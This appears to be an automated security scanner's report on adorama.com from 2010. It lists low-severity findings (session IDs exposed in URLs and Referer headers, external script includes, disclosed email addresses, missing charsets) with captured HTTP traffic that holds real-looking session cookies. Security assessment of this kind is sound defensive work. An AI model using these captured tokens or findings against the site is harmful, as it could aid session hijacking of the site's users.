GET /refby.tpl HTTP/1.1 Host: www.adorama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]... <link rel="canonical" href="http://www.adorama.com/"/> <script type="text/javascript" src="http://code.jquery.com/jquery-1.4.3.min.js"></script> ...[SNIP]... </a><a href="http://www.adoramapix.com/?sid=20101225230855189ky" id="pix" onClick="_gaq.push(['_trackEvent', 'banner', 'TopPix']);"><img src="/artworks2/topnav_pix.gif" alt="Visit AdoramaPix for online photo sharing and digital photo printing create harcover photo books"> ...[SNIP]... <li> <a id="pixInNav" href="http://www.adoramapix.com?sid=20101225230855189ky">Professional Prints</a> ...[SNIP]... <div><a href="http://www.adoramapix.com?sid=20101225230855189ky">Order Prints Online</a> ...[SNIP]... <div><a href="http://www.adoramapix.com/products/photo-books?sid=20101225230855189ky"><strong> ...[SNIP]... <li><a href="http://www.adoramarentals.com/" target="_blank">Rental Department </a> ...[SNIP]... <li><a href="http://www.cellstores.com/mobile/?r=adorama" target="_blank">Wireless Phones & Plans </a> ...[SNIP]... <br> <a target="_blank" href="//www.scanalert.com/RatingVerify?ref=www.adorama.com" onClick="_gaq.push(['_trackEvent', 'banner', 'ScanAlert']);"><img width="94" height="54" border="0" src="//images.scanalert.com/meter/www.adorama.com/23.gif" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;"></a><br><br> <a href="http://www.bbbonline.org/cks.asp?id=121000109" target="_blank" rel="nofollow"><img src="/artworks2/bbbseal3.gif" border="0" alt="BBB Logo"> ...[SNIP]... <!-- BEGIN: BizRate Medal (125x73 pixels) --> <a href="http://www.bizrate.com/ratings_guide/cust_reviews__mid--22495.html" target="_blank"> <img src="//medals.bizrate.com/medals/dynamic/22495_medal.gif" alt="BizRate Customer Certified (GOLD) Site - Adorama Reviews at Bizrate" width="125" height="73" align="top" border="0" ></a> ...[SNIP]... <li class="footerCategoryHead pixCategory"><a href="http://www.adoramapix.com/">AdoramaPix</a> ...[SNIP]... <li><a href="http://www.adoramapix.com/products/prints">Digital Prints</a> ...[SNIP]... <li><a href="http://www.adoramapix.com/products/photo-books">Photo Books</a> ...[SNIP]... <div id="footerSocialStrip"> <a href="http://twitter.com/adorama" class="followTwiter" target="blank">Follow us on twitter</a> <a href="http://www.facebook.com/Adorama" class="followFacebook" target="blank">Become a fan</a> <a href="http://www.youtube.com/user/adoramaTV" class="followYouTube" target="blank">Whatch us on you tube</a> ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]... </a><a href="http://www.adoramapix.com/?sid=20101225230855189ky" id="pix" onClick="_gaq.push(['_trackEvent', 'banner', 'TopPix']);"><img src="/artworks2/topnav_pix.gif" alt="Visit AdoramaPix for online photo sharing and digital photo printing create harcover photo books"> ...[SNIP]... <li> <a id="pixInNav" href="http://www.adoramapix.com?sid=20101225230855189ky">Professional Prints</a> ...[SNIP]... <div><a href="http://www.adoramapix.com?sid=20101225230855189ky">Order Prints Online</a> ...[SNIP]... <div><a href="http://www.adoramapix.com/products/photo-books?sid=20101225230855189ky"><strong> ...[SNIP]... <li><a href="http://www.adoramarentals.com/" target="_blank">Rental Department </a> ...[SNIP]... <li><a href="http://www.cellstores.com/mobile/?r=adorama" target="_blank">Wireless Phones & Plans </a> ...[SNIP]... <br> <a target="_blank" href="//www.scanalert.com/RatingVerify?ref=www.adorama.com" onClick="_gaq.push(['_trackEvent', 'banner', 'ScanAlert']);"><img width="94" height="54" border="0" src="//images.scanalert.com/meter/www.adorama.com/23.gif" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;"></a><br><br> <a href="http://www.bbbonline.org/cks.asp?id=121000109" target="_blank" rel="nofollow"><img src="/artworks2/bbbseal3.gif" border="0" alt="BBB Logo"> ...[SNIP]... <!-- BEGIN: BizRate Medal (125x73 pixels) --> <a href="http://www.bizrate.com/ratings_guide/cust_reviews__mid--22495.html" target="_blank"> <img src="//medals.bizrate.com/medals/dynamic/22495_medal.gif" alt="BizRate Customer Certified (GOLD) Site - Adorama Reviews at Bizrate" width="125" height="73" align="top" border="0" ></a> ...[SNIP]... <br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICA1DM3R" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICA1DM3R', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" > ...[SNIP]... <br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICA5DM2" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICA5DM2', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" > ...[SNIP]... <br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICA5DM2L13" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICA5DM2L13', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" > ...[SNIP]... <br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICA5DM2L20" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICA5DM2L20', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" > ...[SNIP]... <br><a href="http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICA5DM2K" onClick="window.open('http://syndicate.tentoe.com/Syndicate/SynMaster?ttpid=TTPID-22A-268&vsr_sku=ICA5DM2K', 'popup','width=500,height=400,resizable=1');return false;" target="new"><img src="artworks2/Product_Tour.gif" border="0" > ...[SNIP]... <li class="footerCategoryHead pixCategory"><a href="http://www.adoramapix.com/">AdoramaPix</a> ...[SNIP]... <li><a href="http://www.adoramapix.com/products/prints">Digital Prints</a> ...[SNIP]... <li><a href="http://www.adoramapix.com/products/photo-books">Photo Books</a> ...[SNIP]... <div id="footerSocialStrip"> <a href="http://twitter.com/adorama" class="followTwiter" target="blank">Follow us on twitter</a> <a href="http://www.facebook.com/Adorama" class="followFacebook" target="blank">Become a fan</a> <a href="http://www.youtube.com/user/adoramaTV" class="followYouTube" target="blank">Whatch us on you tube</a> ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> ...[SNIP]... </a><a href="http://www.adoramapix.com/?sid=20101225230855189ky" id="pix" onClick="_gaq.push(['_trackEvent', 'banner', 'TopPix']);"><img src="/artworks2/topnav_pix.gif" alt="Visit AdoramaPix for online photo sharing and digital photo printing create harcover photo books"> ...[SNIP]... <li> <a id="pixInNav" href="http://www.adoramapix.com?sid=20101225230855189ky">Professional Prints</a> ...[SNIP]... <div><a href="http://www.adoramapix.com?sid=20101225230855189ky">Order Prints Online</a> ...[SNIP]... <div><a href="http://www.adoramapix.com/products/photo-books?sid=20101225230855189ky"><strong> ...[SNIP]... <li><a href="http://www.adoramarentals.com/" target="_blank">Rental Department </a> ...[SNIP]... <li><a href="http://www.cellstores.com/mobile/?r=adorama" target="_blank">Wireless Phones & Plans </a> ...[SNIP]... <br> <a target="_blank" href="//www.scanalert.com/RatingVerify?ref=www.adorama.com" onClick="_gaq.push(['_trackEvent', 'banner', 'ScanAlert']);"><img width="94" height="54" border="0" src="//images.scanalert.com/meter/www.adorama.com/23.gif" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;"></a><br><br> <a href="http://www.bbbonline.org/cks.asp?id=121000109" target="_blank" rel="nofollow"><img src="/artworks2/bbbseal3.gif" border="0" alt="BBB Logo"> ...[SNIP]... <!-- BEGIN: BizRate Medal (125x73 pixels) --> <a href="http://www.bizrate.com/ratings_guide/cust_reviews__mid--22495.html" target="_blank"> <img src="//medals.bizrate.com/medals/dynamic/22495_medal.gif" alt="BizRate Customer Certified (GOLD) Site - Adorama Reviews at Bizrate" width="125" height="73" align="top" border="0" ></a> ...[SNIP]... <li>
<a href="http://www.sonystyle.com/is-bin/INTERSHOP.enfinity/eCS/Store/-/-/-/Default_Storefront-Start" target="_blank">Sony Camera and Video</a> ...[SNIP]... <li>
<a href="http://www.sony.com/index.php" target="_blank">Sony Music and Audio</a> ...[SNIP]... <li>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]... </a><a href="http://www.adoramapix.com/?sid=20101225230855189ky" id="pix" onClick="_gaq.push(['_trackEvent', 'banner', 'TopPix']);"><img src="/artworks2/topnav_pix.gif" alt="Visit AdoramaPix for online photo sharing and digital photo printing create harcover photo books"> ...[SNIP]... <li> <a id="pixInNav" href="http://www.adoramapix.com?sid=20101225230855189ky">Professional Prints</a> ...[SNIP]... <div><a href="http://www.adoramapix.com?sid=20101225230855189ky">Order Prints Online</a> ...[SNIP]... <div><a href="http://www.adoramapix.com/products/photo-books?sid=20101225230855189ky"><strong> ...[SNIP]... <li><a href="http://www.adoramarentals.com/" target="_blank">Rental Department </a> ...[SNIP]... <li><a href="http://www.cellstores.com/mobile/?r=adorama" target="_blank">Wireless Phones & Plans </a> ...[SNIP]... <br> <a target="_blank" href="//www.scanalert.com/RatingVerify?ref=www.adorama.com" onClick="_gaq.push(['_trackEvent', 'banner', 'ScanAlert']);"><img width="94" height="54" border="0" src="//images.scanalert.com/meter/www.adorama.com/23.gif" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;"></a><br><br> <a href="http://www.bbbonline.org/cks.asp?id=121000109" target="_blank" rel="nofollow"><img src="/artworks2/bbbseal3.gif" border="0" alt="BBB Logo"> ...[SNIP]... <!-- BEGIN: BizRate Medal (125x73 pixels) --> <a href="http://www.bizrate.com/ratings_guide/cust_reviews__mid--22495.html" target="_blank"> <img src="//medals.bizrate.com/medals/dynamic/22495_medal.gif" alt="BizRate Customer Certified (GOLD) Site - Adorama Reviews at Bizrate" width="125" height="73" align="top" border="0" ></a> ...[SNIP]... </form>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.js"></script> ...[SNIP]... <li class="footerCategoryHead pixCategory"><a href="http://www.adoramapix.com/">AdoramaPix</a> ...[SNIP]... <li><a href="http://www.adoramapix.com/products/prints">Digital Prints</a> ...[SNIP]... <li><a href="http://www.adoramapix.com/products/photo-books">Photo Books</a> ...[SNIP]... <div id="footerSocialStrip"> <a href="http://twitter.com/adorama" class="followTwiter" target="blank">Follow us on twitter</a> <a href="http://www.facebook.com/Adorama" class="followFacebook" target="blank">Become a fan</a> <a href="http://www.youtube.com/user/adoramaTV" class="followYouTube" target="blank">Whatch us on you tube</a> ...[SNIP]...
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml ...[SNIP]... </script> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script> ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml ...[SNIP]... </script> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script> ...[SNIP]... </div>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml ...[SNIP]... </script> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script> ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml ...[SNIP]... </script> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script> ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml ...[SNIP]... </script> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script> ...[SNIP]... </div>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml ...[SNIP]... </script> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script> ...[SNIP]... </div>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml ...[SNIP]... </script> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script> ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml ...[SNIP]... </script> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script> ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml ...[SNIP]... </script> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script> ...[SNIP]... </div>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml ...[SNIP]... </script> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script> ...[SNIP]... </div>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml ...[SNIP]... </script> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script> ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml ...[SNIP]... </script> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script> ...[SNIP]... </p>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml ...[SNIP]... </script> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script> ...[SNIP]... </div>
...[SNIP]... <!-- BEGIN HumanTag Monitor. DO NOT MOVE! MUST BE PLACED JUST BEFORE THE /BODY TAG --><script language='javascript' src='https://server.iad.liveperson.net/hc/12511569/x.js?cmd=file&file=chatScript3&site=12511569'> </script> ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml ...[SNIP]... <a href="http://www.adorama.com/catalog.tpl?op=process&func=contact_form" onclick="window.open('/catalog.tpl?op=process&func=contact_form&sendto=webmaster@adorama.com', 'popup', 'width=470,height=550');return false;" class="FooterLink"> ...[SNIP]...
HTTP/1.1 200 OK ETag: "b8d8bc9432efc51:2c6" Server: Microsoft-IIS/6.0 ServerID: 5 X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Tue, 22 Nov 2005 07:01:37 GMT Vary: Accept-Encoding Date: Sun, 26 Dec 2010 15:18:48 GMT Connection: close Content-Length: 2853
// Changes: Sandeep V. Tamhankar (stamhankar@hotmail.com) // This script and many more are available free online at // The JavaScript Source!! http://javascript.internet.com // Begin
//SN - Added Silent Parameter - so that we can just check the e ...[SNIP]...
The following email address was disclosed in the response:
erik@bosrup.com
Request
GET /ainc/overlib.js HTTP/1.1 Host: www.adorama.com Proxy-Connection: keep-alive Referer: http://www.adorama.com/ICA1DM4.html?utm_term=Other&utm_medium=Others&utm_campaign=Other&utm_source=become Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AJAXrefby=become; header_refby=become; Session_Refby=become; ABFlag=89; sub=; sterm=; refby=; ETjobid=
Response
HTTP/1.1 200 OK ETag: "e8d84866d554c51:2c6" Server: Microsoft-IIS/6.0 ServerID: 5 X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Mon, 09 May 2005 20:26:37 GMT Vary: Accept-Encoding Date: Sun, 26 Dec 2010 04:08:54 GMT Connection: close Content-Length: 27122
//\////////////////////////////////////////////////////////////////////////////////// //\ overLIB 3.51 -- This notice must remain untouched at all times. //\ Copyright Erik Bosrup 1998-2002. All rights reserved. //\ //\ By Erik Bosrup (erik@bosrup.com). Last modified 2002-11-01. //\ Portions by Dan Steinman (dansteinman.com). Additions by other people are //\ listed on the overLIB homepage. //\ //\ Get the latest version at http://www.bosru ...[SNIP]...
The following email address was disclosed in the response:
info@adorama.com
Request
GET /catalog.tpl?op=process&func=contact_form&sendto=webmaster@adorama.com HTTP/1.1 Host: www.adorama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;
Response
HTTP/1.1 200 OK Expires: Sun, 26 Dec 2010 04:33:13 GMT Mime-Version: 1.0 Content-Type: text/html Date: Sun, 26 Dec 2010 04:33:13 GMT Content-Length: 5173 Connection: close Set-Cookie: sid3=20101225230855189ky; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/ Set-Cookie: ABFlag=89; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
GET /Experiment/HPN/Old HTTP/1.1 Host: www.adorama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;
Response
HTTP/1.1 404 Not Found Status: 404 Expires: Sun, 26 Dec 2010 04:33:33 GMT Mime-Version: 1.0 Content-Type: text/html Content-Length: 28229 Vary: Accept-Encoding Date: Sun, 26 Dec 2010 04:33:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
GET /ecommerce/images/icon_shoppingcart.gif/ HTTP/1.1 Host: www.adorama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;
Response
HTTP/1.1 404 Not Found Status: 404 Expires: Sun, 26 Dec 2010 04:33:33 GMT Mime-Version: 1.0 Content-Type: text/html Content-Length: 28229 Vary: Accept-Encoding Date: Sun, 26 Dec 2010 04:33:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
GET /ecommerce/images/icon_wishlist.gif/ HTTP/1.1 Host: www.adorama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;
Response
HTTP/1.1 404 Not Found Status: 404 Expires: Sun, 26 Dec 2010 04:33:35 GMT Mime-Version: 1.0 Content-Type: text/html Content-Length: 28231 Vary: Accept-Encoding Date: Sun, 26 Dec 2010 04:33:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
GET /ps/catalog.pl HTTP/1.1 Host: www.adorama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;
Response
